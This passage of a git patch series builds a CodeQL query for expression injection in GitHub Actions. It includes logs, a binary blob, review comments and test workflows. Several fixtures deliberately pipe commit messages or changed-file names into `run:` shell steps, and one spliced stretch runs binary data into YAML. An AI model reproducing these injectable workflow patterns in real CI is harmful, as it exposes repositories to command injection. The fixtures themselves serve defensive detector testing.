TRAP.", + "type" : "object", + "properties" : { + "compression" : { + "title" : "Controls compression for the TRAP files written by the extractor.", + "description" : "This option is only intended for use in debugging the extractor. 
Accepted values are 'gzip' (the default, to write gzip-compressed TRAP) and 'none' (to write uncompressed TRAP).\n", + "type" : "string", + "pattern" : "^(none|gzip)$" + } + } + } + } + } + ] + } + } +[2024-02-03 10:17:52] [PROGRESS] database init> Calculating baseline information in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test +[2024-02-03 10:17:52] [SPAMMY] database init> Ignoring the following directories when processing baseline information: .git, .hg, .svn. +[2024-02-03 10:17:52] [DETAILS] database init> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/tools/osx64/scc --by-file --exclude-dir .git,.hg,.svn --format json --no-large --no-min . +[2024-02-03 10:17:52] [PROGRESS] database init> Calculated baseline information for languages: (387ms). +[2024-02-03 10:17:52] [PROGRESS] database init> Resolving extractor yaml. +[2024-02-03 10:17:52] [DETAILS] database init> Found candidate extractor root for yaml: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml. +[2024-02-03 10:17:52] [PROGRESS] database init> Successfully loaded extractor YAML (yaml) from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml. +[2024-02-03 10:17:52] [PROGRESS] database init> Created skeleton CodeQL database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db. This in-progress database is ready to be populated by an extractor. +[2024-02-03 10:17:52] Plumbing command codeql database init completed. 
+[2024-02-03 10:17:52] [PROGRESS] database create> Running build command: [] +[2024-02-03 10:17:52] Running plumbing command: codeql database trace-command --working-dir=/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test --index-traceless-dbs --no-db-cluster -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db +[2024-02-03 10:17:52] Using autobuild script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/autobuild.sh. +[2024-02-03 10:17:52] [PROGRESS] database trace-command> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/autobuild.sh] +[2024-02-03 10:17:52] [build-stderr] Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test... +[2024-02-03 10:17:53] [build-stderr] /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db: Indexing files in in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test... +[2024-02-03 10:17:53] [build-stderr] Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh, /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/working/files-to-index11251721875757902238.list] +[2024-02-03 10:17:53] Plumbing command codeql database trace-command completed. +[2024-02-03 10:17:53] [PROGRESS] database create> Finalizing database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db. +[2024-02-03 10:17:53] Running plumbing command: codeql database finalize --mode=trim --no-db-cluster -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db +[2024-02-03 10:17:53] [PROGRESS] database finalize> Running TRAP import for CodeQL database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db... 
+[2024-02-03 10:17:53] Running plumbing command: codeql dataset import --dbscheme=/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/yaml.dbscheme -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/trap/yaml +[2024-02-03 10:17:53] Clearing disk cache since the version file /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml/default/cache/version does not exist +[2024-02-03 10:17:53] Tuple pool not found. Clearing relations with cached strings +[2024-02-03 10:17:53] Trimming disk cache at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml/default/cache in mode clear. +[2024-02-03 10:17:53] Sequence stamp origin is -6222583521912648850 +[2024-02-03 10:17:53] Pausing evaluation to hard-clear memory at sequence stamp o+0 +[2024-02-03 10:17:53] Unpausing evaluation +[2024-02-03 10:17:53] Pausing evaluation to quickly trim disk at sequence stamp o+1 +[2024-02-03 10:17:53] Unpausing evaluation +[2024-02-03 10:17:53] Pausing evaluation to zealously trim disk at sequence stamp o+2 +[2024-02-03 10:17:53] Unpausing evaluation +[2024-02-03 10:17:53] Trimming completed (7ms): Purged everything. 
+[2024-02-03 10:17:53] Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/trap/yaml +[2024-02-03 10:17:53] Found 8 TRAP files (16.41 KiB) +[2024-02-03 10:17:53] [PROGRESS] dataset import> Importing TRAP files +[2024-02-03 10:17:53] Importing changed-files.yml.trap.gz (1 of 8) +[2024-02-03 10:17:53] Importing inter1.yml.trap.gz (2 of 8) +[2024-02-03 10:17:53] Importing no-flow1.yml.trap.gz (3 of 8) +[2024-02-03 10:17:53] Importing no-flow2.yml.trap.gz (4 of 8) +[2024-02-03 10:17:53] Importing simple1.yml.trap.gz (5 of 8) +[2024-02-03 10:17:53] Importing simple2.yml.trap.gz (6 of 8) +[2024-02-03 10:17:53] Importing test.yml.trap.gz (7 of 8) +[2024-02-03 10:17:53] Importing sourceLocationPrefix.trap.gz (8 of 8) +[2024-02-03 10:17:53] [PROGRESS] dataset import> Merging relations +[2024-02-03 10:17:53] Merging 1 fragment for 'files'. +[2024-02-03 10:17:53] Merged 56 bytes for 'files'. +[2024-02-03 10:17:53] Merging 1 fragment for 'folders'. +[2024-02-03 10:17:53] Merged 80 bytes for 'folders'. +[2024-02-03 10:17:53] Merging 1 fragment for 'containerparent'. +[2024-02-03 10:17:53] Merged 128 bytes for 'containerparent'. +[2024-02-03 10:17:53] Merging 1 fragment for 'yaml_scalars'. +[2024-02-03 10:17:53] Merged 3048 bytes (2.98 KiB) for 'yaml_scalars'. +[2024-02-03 10:17:53] Merging 1 fragment for 'yaml'. +[2024-02-03 10:17:53] Merged 7992 bytes (7.80 KiB) for 'yaml'. +[2024-02-03 10:17:53] Merging 1 fragment for 'locations_default'. +[2024-02-03 10:17:53] Merged 7992 bytes (7.80 KiB) for 'locations_default'. +[2024-02-03 10:17:53] Merging 1 fragment for 'yaml_locations'. +[2024-02-03 10:17:53] Merged 2664 bytes (2.60 KiB) for 'yaml_locations'. +[2024-02-03 10:17:53] Merging 1 fragment for 'sourceLocationPrefix'. +[2024-02-03 10:17:53] Merged 4 bytes for 'sourceLocationPrefix'. +[2024-02-03 10:17:53] Saving string and id pools to disk. +[2024-02-03 10:17:54] Finished importing TRAP files. 
+[2024-02-03 10:17:54] Read 77.48 KiB of uncompressed TRAP data. +[2024-02-03 10:17:54] Relation data size: 21.45 KiB (merge rate: 1.20 MiB/s) +[2024-02-03 10:17:54] String pool size: 2.05 MiB +[2024-02-03 10:17:54] ID pool size: 1.03 MiB +[2024-02-03 10:17:54] [PROGRESS] dataset import> Finished writing database (relations: 21.45 KiB; string pool: 2.05 MiB). +[2024-02-03 10:17:54] Pausing evaluation to close the cache at sequence stamp o+3 +[2024-02-03 10:17:54] The disk cache is freshly trimmed; leave it be. +[2024-02-03 10:17:54] Unpausing evaluation +[2024-02-03 10:17:54] Plumbing command codeql dataset import completed. +[2024-02-03 10:17:54] [PROGRESS] database finalize> TRAP import complete (817ms). +[2024-02-03 10:17:54] Running plumbing command: codeql database cleanup --mode=trim -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db +[2024-02-03 10:17:54] [PROGRESS] database cleanup> Cleaning up existing TRAP files after import... +[2024-02-03 10:17:54] [PROGRESS] database cleanup> TRAP files cleaned up (6ms). +[2024-02-03 10:17:54] [PROGRESS] database cleanup> Cleaning up scratch directory... +[2024-02-03 10:17:54] [PROGRESS] database cleanup> Scratch directory cleaned up (0ms). +[2024-02-03 10:17:54] Running plumbing command: codeql dataset cleanup --mode=trim -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml +[2024-02-03 10:17:54] [PROGRESS] dataset cleanup> Cleaning up dataset in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml. +[2024-02-03 10:17:54] Trimming disk cache at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml/default/cache in mode trim. +[2024-02-03 10:17:54] Sequence stamp origin is -6222583518558519910 +[2024-02-03 10:17:54] Pausing evaluation to zealously trim disk at sequence stamp o+0 +[2024-02-03 10:17:54] Unpausing evaluation +[2024-02-03 10:17:54] Trimming completed (2ms): Trimmed disposable data from cache. 
+[2024-02-03 10:17:54] Pausing evaluation to close the cache at sequence stamp o+1 +[2024-02-03 10:17:54] The disk cache is freshly trimmed; leave it be. +[2024-02-03 10:17:54] Unpausing evaluation +[2024-02-03 10:17:54] [PROGRESS] dataset cleanup> Trimmed disposable data from cache. +[2024-02-03 10:17:54] [PROGRESS] dataset cleanup> Finalizing dataset in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml +[2024-02-03 10:17:54] [DETAILS] dataset cleanup> Finished deleting ID pool from /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml (4ms). +[2024-02-03 10:17:54] Plumbing command codeql dataset cleanup completed. +[2024-02-03 10:17:54] Plumbing command codeql database cleanup completed with status 0. +[2024-02-03 10:17:54] [PROGRESS] database finalize> Finished zipping source archive (3.73 KiB). +[2024-02-03 10:17:54] Plumbing command codeql database finalize completed. +[2024-02-03 10:17:54] [PROGRESS] database create> Successfully created database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db. +[2024-02-03 10:17:54] Terminating normally. diff --git a/ql/src/test-db/log/database-index-files-20240203.101752.962.log b/ql/src/test-db/log/database-index-files-20240203.101752.962.log new file mode 100644 index 00000000000..f410634a29f --- /dev/null +++ b/ql/src/test-db/log/database-index-files-20240203.101752.962.log 
@@ -0,0 +1,21 @@ +[2024-02-03 10:17:52] This is codeql database index-files --include-extension=.yaml --include-extension=.yml --size-limit=5m --language=yaml /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db +[2024-02-03 10:17:52] Log file was started late. +[2024-02-03 10:17:52] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh. +[2024-02-03 10:17:52] [PROGRESS] database index-files> Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test... +[2024-02-03 10:17:52] Calling plumbing command: codeql resolve files --include-extension=.yaml --include-extension=.yml --size-limit=5m /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test --format=json +[2024-02-03 10:17:53] [PROGRESS] resolve files> Scanning /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test... +[2024-02-03 10:17:53] Plumbing command codeql resolve files completed: + [ + "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/changed-files.yml", + "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/inter1.yml", + "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/test.yml", + "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/no-flow1.yml", + "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/no-flow2.yml", + "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/simple1.yml", + "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/simple2.yml" + ] +[2024-02-03 10:17:53] [DETAILS] database index-files> Found 7 files. +[2024-02-03 10:17:53] [PROGRESS] database index-files> /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db: Indexing files in in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test... 
+[2024-02-03 10:17:53] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh. +[2024-02-03 10:17:53] [PROGRESS] database index-files> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh, /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/working/files-to-index11251721875757902238.list] +[2024-02-03 10:17:53] Terminating normally. 
diff --git a/ql/src/test-db/src.zip b/ql/src/test-db/src.zip new file mode 100644 index 0000000000000000000000000000000000000000..9c82ac3a64444a993e3a461dc000184a22d1e3a8 GIT binary patch literal 3816 zcmcImc{r4N8y@S7B{SK=NTkh#nL(1VrA-ZHjHS`3oUF~53^Qa2O^Bj=jVy6c985U& zeHn+5eG6p`2PGa)KF_JzvD?24Noy;#teq+~c`=vh_tIRa?!WW!^|NG ziWLj;R3$WF@PRVmbLC@G8WJxWF2*{5-xFje*R*S{jZdE!ql66TQQ9{;;m$p;g*`U? zCf-^uQULUp%4!G#7t#!jL?f3H3JPDSywe@G3Sk`M`KxcmY65Byc)29G{#GqkqAbEv z_ng;paJl96up=4?$D13oqYYH=$tX04R*c*Yqk$xLHp8l3-mDwm4Uu{KMEcU^u3gX# z!xx#WWf>W7TI-dIB}04f1e(e4t>hI9z8ue)cz6qw6;6Lea%lDGDGZNGtG7AwAL;$d z_%CBH?e2xzWTU{3A2;RQO(K$7&6u6jm%dyH!x!`u;{Dg>`{LVY3IL9DTDgZg^N#94 z*CqE@WSSR{BO3LW9ZYSuXr(_D4YNI>xsX*HNo3EjvRPtlOoI>*=JMeK_F|@4QW#A) zyUM2rb*sJ2f0fL5u3(%Q5_PjAHz+qmGr^lY{2oe?39in9*jVIC0!V8~wQDN^2>ynM zy$2&}R^(CRbS56Lr1de1U%sYC<`E08@P{s~x>3f*T;I|9x)Y47^e!PQGxe_1vm|wi zb4$N_v@O(XE<5{WmIzv1+7Z&i7kB42ZWOGYb3x-%dU93CdT735FUBS2*P-Ps)=2wm zM)50TTmFfn0hpjaDABSoHti&64$R>kVNKRrW;2?|=KbG|vb~(EajfD;$B8>eN*?qce$ue!L(J+@SJcsb!3LQK2&|CQ38rj9$My9!!WL8M7K2DVLhA zSHeZ$_miDJgeu@rV=2`E4`4*6+IZckS!lPs8`^&Ymb827AY2lsEW;u$m@0PgrzWnR z<`F+XIW?JY;M#PU_2B)Kn_@QqY5)GZJsTL}t8nbGkmiaBxiBD;>qx$D`+~238nQ0h zaQ0EJH=L^bL-{6)K6o0m3*?rv^pObUHz{yS3n9NvtUa3fEWg-iQL2NM!zq;v92kgeCd_Oa$Z2Xx)n=E4=#)}}a*w7AZFMEF=}qop6) za0L9AouzYg%1HQ}>K$v5(#jyc`WRW?<9tpn3C!|jR zNaAL1osGGZI}M1W>$WD{Bo8jhChyDekBPhiC92@lAf5TjO5i=@ikX8=lgk2{Heh%O zR9K?BeN>{LbmxgpX+q+|Qt8-QT5dM*%|>*{gy9R>;=xftjm-tdIc2BV; z-O9&+8>eCsiLz~Pq+%>5%y6BYNyKtJ=8$#+>+qZyg zTx01;?Jbr*$VUX>PK}fB5BQ6yN~#qNRQ~GWXXoxo8r(Iryl97ZIn>ujcv3Y6x_x+Y zQA$O=^tA+Q5<2PDlEbaWOc}#$f=L%cu-d>>&o*7j9X>q76n|K#ty|j8I-=^-r@kJX z0=N@eVXe20T1U`mQ=J@m=}$tJwN9xMqL8a@GhqyeZ!XI zei0gIM00*jBIy)G2jAaso_FZtBjf7nw%O>C%zmG|3wqhn+2$sllbcGRB`@jL^EG;J z`n}cVWRV(VXQ#Oi?_=eaJ-O+Y5s7?I#> "$GITHUB_OUTPUT" + - id: sink + run: | + echo "echo ${{steps.no-step.outputs.foo}}" + + diff --git a/ql/src/test/no-flow2.yml b/ql/src/test/no-flow2.yml new file mode 100644 index 00000000000..429d4650b60 --- /dev/null 
+++ b/ql/src/test/no-flow2.yml
@@ -0,0 +1,37 @@
+name: CI
+
+on:
+ pull_request:
+ branches:
+ - main
+
+jobs:
+ changed_files:
+ runs-on: ubuntu-latest
+ name: Test changed-files
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ fetch-depth: 0
+
+ - name: Get changed files
+ id: source
+ uses: tj-actions/changed-files@v40
+
+ - name: Remove foo from changed files
+ id: step
+ uses: mad9000/actions-find-and-replace-string@3
+ with:
+ source: 'foobarfoo'
+ find: 'foo'
+ replace: ''
+
+ - name: List all changed files
+ id: sink
+ run: |
+ for file in ${{ steps.step.outputs.value }}; do
+ echo "$file was changed"
+ done
+
+
+
diff --git a/ql/src/test/simple1.yml b/ql/src/test/simple1.yml
new file mode 100644
index 00000000000..f61e763f188
--- /dev/null
+++ b/ql/src/test/simple1.yml
@@ -0,0 +1,16 @@
+on: push
+
+jobs:
+ simple1:
+ runs-on: ubuntu-latest
+
+ steps:
+ - id: source
+ uses: mad9000/actions-find-and-replace-string@3
+ with:
+ source: ${{ github.event.head_commit.message }}
+ find: 'foo'
+ replace: ''
+ - id: sink
+ run: |
+ echo "${{steps.source.outputs.value}}"
diff --git a/ql/src/test/simple2.yml b/ql/src/test/simple2.yml
new file mode 100644
index 00000000000..f3d79b97bc2
--- /dev/null
+++ b/ql/src/test/simple2.yml
@@ -0,0 +1,36 @@
+name: CI
+
+on:
+ pull_request:
+ branches:
+ - main
+
+jobs:
+ changed_files:
+ runs-on: ubuntu-latest
+ name: Test changed-files
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ fetch-depth: 0
+
+ - name: Get changed files
+ id: source
+ uses: tj-actions/changed-files@v40
+
+ - name: Remove foo from changed files
+ id: step
+ uses: mad9000/actions-find-and-replace-string@3
+ with:
+ source: ${{ steps.source.outputs.all_changed_files }}
+ find: 'foo'
+ replace: ''
+
+ - name: List all changed files
+ id: sink
+ run: |
+ for file in ${{ steps.step.outputs.value }}; do
+ echo "$file was changed"
+ done
+
+
diff --git a/ql/src/test/test.ql b/ql/src/test/test.ql
new file mode 100644
index 00000000000..f8d6e0c804b
--- /dev/null
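Review bot: Nothing in no-flow2.yml records what the query is expected to report for it, and the same holds for simple1.yml and simple2.yml in this patch. Judging by the file name and by `source: 'foobarfoo'` being a literal, the `run:` step here should produce no alert, while simple1.yml and simple2.yml pass `github.event.head_commit.message` and `steps.source.outputs.all_changed_files` into the same replace step and presumably should. A first-line comment such as `# expected: no alert, the replace step's input is a constant` would make a regression in either direction visible to a reader, and would mark these workflows as deliberately unsafe fixtures rather than templates.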
+++ b/ql/src/test/test.ql @@ -0,0 +1,37 @@ +/** + * @name Expression injection in Actions + * @description Using user-controlled GitHub Actions contexts like `run:` or `script:` may allow a malicious + * user to inject code into the GitHub action. + * @kind path-problem + * @problem.severity warning + * @security-severity 9.3 + * @precision high + * @id actions/command-injection + * @tags actions + * security + * external/cwe/cwe-094 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources + +private class ExpressionInjectionSink extends DataFlow::Node { + ExpressionInjectionSink() { exists(RunExpr e | e.getScriptExpr() = this.asExpr()) } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where MyFlow::flowPath(source, sink) +select sink.getNode(), source, sink, + "Potential injection from the ${{ " + sink.getNode().asExpr().(ExprAccessExpr).getExpression() + + " }}, which may be controlled by an external user." diff --git a/ql/src/test/test.yml b/ql/src/test/test.yml new file mode 100644 index 00000000000..8f9cbf3b644 --- /dev/null +++ b/ql/src/test/test.yml 
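Review bot: The inline cast `sink.getNode().asExpr().(ExprAccessExpr)` in the `select` clause also acts as a filter, so any path whose sink expression is not an `ExprAccessExpr` is silently left out of the results rather than reported with a poorer message. Whether that can happen depends on what `RunExpr.getScriptExpr()` returns, which this hunk does not show; if it can, build the message from `sink.getNode().toString()` or move the type test into `ExpressionInjectionSink` so the restriction is explicit. Separately, the metadata says `@id actions/command-injection` while the name and the `external/cwe/cwe-094` tag describe expression injection. This file also has the same blob id (f8d6e0c804b) as ql/src/Security/CWE-094/ExpressionInjection.ql in the following patch, so two queries would appear to share one id.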
@@ -0,0 +1,35 @@ +on: push + +jobs: + job1: + runs-on: ubuntu-latest + + outputs: + job_output: ${{ steps.step2.outputs.test }} + + steps: + - uses: actions/checkout@v4 + - id: step0 + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ github.event.head_commit.message }} + find: 'foo' + replace: '' + - id: step1 + env: + BODY: ${{ steps.step0.outputs.value}} + run: | + Write-Output "::set-output name=MSG::$ENV{BODY}" + - id: step2 + run: echo "test=${{steps.step1.outputs.MSG}}" >> "$GITHUB_OUTPUT" + + job2: + runs-on: ubuntu-latest + + if: ${{ always() }} + + needs: job1 + + steps: + - env: + run: echo ${{needs.job1.outputs.job_output}} From 355ccf42ee38d6855833e3042ebca3de0f596147 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Feb 2024 10:44:37 +0100 Subject: [PATCH 0003/1267] Do not compress local flow steps Use `neverSkipPathGrap` to `any()` so no local flow steps get pruned and thrown away in order to compress the presented dataflow path. --- .../internal/DataFlowImplSpecific.qll | 5 +++- .../dataflow/internal/DataFlowPrivate.qll | 28 +++++-------------- .../Security/CWE-094/ExpressionInjection.ql | 1 + 3 files changed, 12 insertions(+), 22 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll index 4abb455b0dd..2d3b9696ef6 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll @@ -6,6 +6,9 @@ private import codeql.dataflow.DataFlow module ActionsDataFlow implements InputSig { - import DataFlowPrivate + import DataFlowPrivate as Private import DataFlowPublic + import Private + + predicate neverSkipInPathGraph = Private::neverSkipInPathGraph/1; } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index b4abb3e8aa5..8b57ea2436e 100644 
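Review bot: The only step of `job2` starts with an `env:` key that has no value, directly followed by `run: echo ${{needs.job1.outputs.job_output}}`. The page has lost the indentation, so it is not clear whether `run:` is a sibling of `env:` or nested under it; in the second case the step would have no `run:` at all and the job-output sink this fixture is meant to exercise would not exist. Dropping the empty key, `- run: echo ${{needs.job1.outputs.job_output}}`, removes the ambiguity.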
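Review bot: The reason for `predicate neverSkipInPathGraph = Private::neverSkipInPathGraph/1;` in DataFlowImplSpecific.qll is not stated, and next to `import Private` it reads as redundant. Presumably the explicit alias is needed because the `InputSig` signature supplies its own default for this predicate, which a plain import would not replace; that should be confirmed against the shared dataflow library. A one-line comment such as `// override the signature's default; importing Private alone is not enough` would keep a later clean-up from deleting it.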
--- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -207,27 +207,6 @@ predicate stepOutputDefToUse(Node nodeFrom, Node nodeTo) { ) } -predicate test1(UsesExpr u, string f, JobStmt j) { - u.getLocation().getFile().getBaseName() = "inter1.yml" and - f = u.getId() and - j = u.getJob() -} - -predicate test2(StepOutputAccessExpr r, string f, JobStmt j) { - r.getLocation().getFile().getBaseName() = "inter1.yml" and - f = r.getStepId() and - j = r.getJob() -} - -predicate test3(UsesExpr u, StepOutputAccessExpr r, Node n) { - r.getLocation().getFile().getBaseName() = "inter1.yml" and - u.getLocation().getFile().getBaseName() = "inter1.yml" and - u.getId() = r.getStepId() and - u.getJob() = r.getJob() and - // el SOAE has no mapping DF NODE - n.asExpr() = r -} - predicate jobOutputDefToUse(Node nodeFrom, Node nodeTo) { // nodeTo is a JobOutputAccessExpr and nodeFrom is the Job output expression exists(Expression astFrom, JobOutputAccessExpr astTo | @@ -310,3 +289,10 @@ predicate lambdaCall(DataFlowCall call, LambdaCallKind kind, Node receiver) { no /** Extra data-flow steps needed for lambda flow analysis. */ predicate additionalLambdaFlowStep(Node nodeFrom, Node nodeTo, boolean preservesValue) { none() } + +/** + * Since our model is so simple, we dont want to compress the local flow steps. + * This compression is normally done to not show SSA steps, casts, etc. + */ +predicate neverSkipInPathGraph(Node node) { any() } + diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index f8d6e0c804b..4af1e2c286a 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql 
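Review bot: The doc comment on `neverSkipInPathGraph(Node node) { any() }` in the second hunk gives the reason for the predicate but not its cost. Because it holds for every node, every query built on this library now shows every intermediate step, so reported paths get longer as workflows grow. The comment could say so and fix the "dont" typo, e.g. `* Keep every node in the path graph: this model has no SSA or cast steps worth hiding, at the price of longer paths.` The hunk also adds a blank line after the predicate at the end of the file, which can be dropped.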
@@ -24,6 +24,7 @@ private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } + //predicate neverSkip(DataFlow::Node node) { any() } } module MyFlow = TaintTracking::Global; From 093b1a22110b2573befe6dd8c7662ce863038a34 Mon Sep 17 00:00:00 2001 
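Review bot: The added line `//predicate neverSkip(DataFlow::Node node) { any() }` is commented-out code inside `MyConfig`, and it is the only change this hunk makes to the query. The same patch already defines `neverSkipInPathGraph` for the whole library in DataFlowPrivate.qll, so the line tells a reader nothing; either delete it or replace it with a sentence saying where path-graph compression is turned off. `MyConfig` opens above the hunk.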
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Feb 2024 10:45:52 +0100 Subject: [PATCH 0004/1267] Remove test dbs --- ql/lib/test-db/baseline-info.json | 1 - ql/lib/test-db/codeql-database.yml | 10 - ql/lib/test-db/db-yaml/default/cache/.lock | 0 .../cache/cached-strings/pools/0/buckets/info | Bin 40 -> 0 bytes .../pools/0/buckets/page-000000 | Bin 8192 -> 0 bytes .../cache/cached-strings/pools/0/ids1/info | Bin 40 -> 0 bytes .../cached-strings/pools/0/ids1/page-000000 | Bin 8192 -> 0 bytes .../cached-strings/pools/0/indices1/info | Bin 40 -> 0 bytes .../pools/0/indices1/page-000000 | Bin 8192 -> 0 bytes .../default/cache/cached-strings/pools/0/info | Bin 41 -> 0 bytes .../cached-strings/pools/0/metadata/info | Bin 40 -> 0 bytes .../pools/0/metadata/page-000000 | Bin 8192 -> 0 bytes .../pools/0/pageDump/page-000000000 | Bin 1048592 -> 0 bytes .../cache/cached-strings/pools/poolInfo | Bin 28 -> 0 bytes .../cache/cached-strings/tuple-pool/header | Bin 4 -> 0 bytes ...9--Implementation---Cached--TNode-56603d11 | Bin 16 -> 0 bytes ...mplementation---Cached--TNode-56603d11#0#e | Bin 24 -> 0 bytes ...plementation---Cached--TNode-56603d11#1#eb | Bin 32 -> 0 bytes ...mplementation---Cached--TNode-56603d11#2#e | Bin 24 -> 0 bytes ...lementation---Cached--TNode-56603d11#3#eet | Bin 1080 -> 0 bytes ...-Implementation---Cached--TSplits-cdffdde7 | Bin 16 -> 0 bytes ...plementation---Cached--TSplits-cdffdde7#0# | Bin 12 -> 0 bytes ...ples#Cfg#f90a6699--Completion--TCompletion | Bin 16 -> 0 bytes ...s#Cfg#f90a6699--Completion--TCompletion#0# | Bin 12 -> 0 bytes ...s#Cfg#f90a6699--Completion--TSuccessorType | Bin 16 -> 0 bytes ...fg#f90a6699--Completion--TSuccessorType#0# | Bin 12 -> 0 bytes ...g#f90a6699--Completion--TSuccessorType#1#b | Bin 24 -> 0 bytes ...fg#f90a6699--Completion--TSuccessorType#2# | Bin 12 -> 0 bytes .../tuples#DataFlowPrivate#6a54d7ad--TNode | Bin 16 -> 0 bytes ...tuples#DataFlowPrivate#6a54d7ad--TNode#0#t | Bin 544 -> 0 bytes 
.../db-yaml/default/cache/pages/01.pack | Bin 118 -> 0 bytes .../db-yaml/default/cache/pages/02.pack | Bin 79 -> 0 bytes .../db-yaml/default/cache/pages/0d.pack | Bin 92 -> 0 bytes .../db-yaml/default/cache/pages/15.pack | Bin 131 -> 0 bytes .../db-yaml/default/cache/pages/1f.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/1f.pack.d | Bin 85 -> 0 bytes .../db-yaml/default/cache/pages/29.pack | Bin 84 -> 0 bytes .../db-yaml/default/cache/pages/2b.pack | Bin 92 -> 0 bytes .../db-yaml/default/cache/pages/2d.pack | Bin 91 -> 0 bytes .../db-yaml/default/cache/pages/34.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/34.pack.d | Bin 865 -> 0 bytes .../db-yaml/default/cache/pages/37.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/37.pack.d | Bin 163 -> 0 bytes .../db-yaml/default/cache/pages/43.pack | Bin 368 -> 0 bytes .../db-yaml/default/cache/pages/54.pack | Bin 229 -> 0 bytes .../db-yaml/default/cache/pages/55.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/55.pack.d | Bin 140 -> 0 bytes .../db-yaml/default/cache/pages/9c.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/9c.pack.d | Bin 1086 -> 0 bytes .../db-yaml/default/cache/pages/a1.pack | Bin 99 -> 0 bytes 